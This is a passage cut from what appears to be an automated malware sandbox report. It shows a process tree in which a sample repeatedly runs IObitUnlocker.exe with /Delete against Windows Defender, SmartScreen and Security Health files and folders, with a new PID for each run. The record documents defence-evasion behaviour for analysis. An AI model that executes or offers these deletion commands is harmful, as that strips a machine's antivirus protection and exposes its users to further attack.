Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 